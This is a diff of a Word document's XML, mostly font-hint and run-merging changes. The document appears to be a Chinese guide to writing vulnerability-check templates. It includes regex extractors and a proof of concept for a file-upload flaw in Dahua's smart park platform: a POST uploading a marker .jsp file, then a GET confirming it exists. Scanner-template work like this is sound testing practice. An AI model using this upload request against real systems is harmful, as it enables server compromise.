+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="af0"/>
@@ -4118,30 +4676,42 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "regex": "VIEWSTATE:body:PGlucHV0W14+XSpuYW1lPSJfX1ZJRVdTVEFURSJbXj5dKnZhbHVlPSIoW14iXSspIg==",</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -4150,6 +4720,11 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4157,10 +4732,17 @@
         <w:t>拿出来看表达式</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="00B0F0"/>
         </w:rPr>
       </w:pPr>
@@ -4197,8 +4779,19 @@
         <w:t>PGlucHV0W14+XSpuYW1lPSJfX1ZJRVdTVEFURSJbXj5dKnZhbHVlPSIoW14iXSspIg==</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4226,6 +4819,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
@@ -4244,6 +4838,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -4263,6 +4860,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
@@ -4281,6 +4879,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -4300,6 +4901,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
@@ -4318,6 +4920,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>B</w:t>
@@ -4338,6 +4943,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -4349,12 +4957,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="4"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -4374,6 +4988,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4382,6 +5001,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4390,6 +5014,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -4410,7 +5039,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4446,16 +5075,31 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "header": "Set-Cookie:_",</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "regex": "cookie:</w:t>
             </w:r>
@@ -4482,19 +5126,21 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -4503,6 +5149,11 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4528,6 +5179,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>cookie</w:t>
@@ -4539,6 +5193,11 @@
             <w:tcW w:w="5891" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4556,6 +5215,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -4570,6 +5232,11 @@
             <w:tcW w:w="5891" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4587,6 +5254,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -4601,6 +5271,11 @@
             <w:tcW w:w="5891" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4618,6 +5293,9 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>UlVJSklFSUQ9KC4qKTsgcGF0aD0v</w:t>
@@ -4629,6 +5307,11 @@
             <w:tcW w:w="5891" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>B</w:t>
             </w:r>
@@ -4642,12 +5325,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="0E2841" w:themeColor="text2"/>
         </w:rPr>
       </w:pPr>
@@ -4691,6 +5380,11 @@
       <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>J</w:t>
       </w:r>
@@ -4702,6 +5396,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4714,13 +5413,8 @@
         </w:rPr>
         <w:t>大华智慧园区综合管理平台文件</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>devicePoint_addImgIco</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>文件上传</w:t>
+      <w:r>
+        <w:t>devicePoint_addImgIco文件上传</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4732,7 +5426,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -4759,93 +5453,152 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>POST /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>emap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>devicePoint_addImgIco?hasSubsystem</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>=true HTTP/1.1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">Host: </w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Connection: close</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Content-Length: 249</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Encoding: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>gzip</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, deflate</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Encoding: gzip, deflate</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Content-Disposition: form-data; name="upload"; filename="B5FJnD.jsp"</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Content-Type: application/octet-stream</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Content-Transfer-Encoding: binary</w:t>
             </w:r>
           </w:p>
-          <w:p/>
-          <w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>5f8be5deb136b12c15bd8a1732a95a22</w:t>
             </w:r>
           </w:p>
-          <w:p/>
-          <w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--</w:t>
             </w:r>
@@ -4856,7 +5609,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -4883,24 +5636,31 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "body": ".</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>jsp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>",</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "body": ".jsp",</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -4908,38 +5668,15 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>json</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>": "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>jsp:data</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t xml:space="preserve"> "json": "jsp:data"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -4950,7 +5687,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -4977,134 +5714,140 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>GET /upload/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>emap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>society_new</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>GET /upload/emap/society_new/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>{{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>jsp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>}}</w:t>
+              <w:t>{{jsp}}</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> HTTP/1.1</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Host:</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Language: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>zh-CN,zh;q</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Encoding: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>gzip</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">, deflate, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>br</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>zstd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Encoding: gzip, deflate, br, zstd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Connection: keep-alive</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Upgrade-Insecure-Requests: 1</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Sec-Fetch-Dest: document</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Sec-Fetch-Mode: navigate</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Sec-Fetch-Site: none</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Sec-Fetch-User: ?1</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
               <w:t>Priority: u=1</w:t>
@@ -5116,7 +5859,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -5144,29 +5887,41 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "body": "5f8be5deb136b12c15bd8a1732a95a22",</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -5175,31 +5930,23 @@
       </w:tr>
     </w:tbl>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>返回的</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>数据中，取出data键的值</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>返回的json数据中，取出data键的值</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -5223,7 +5970,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
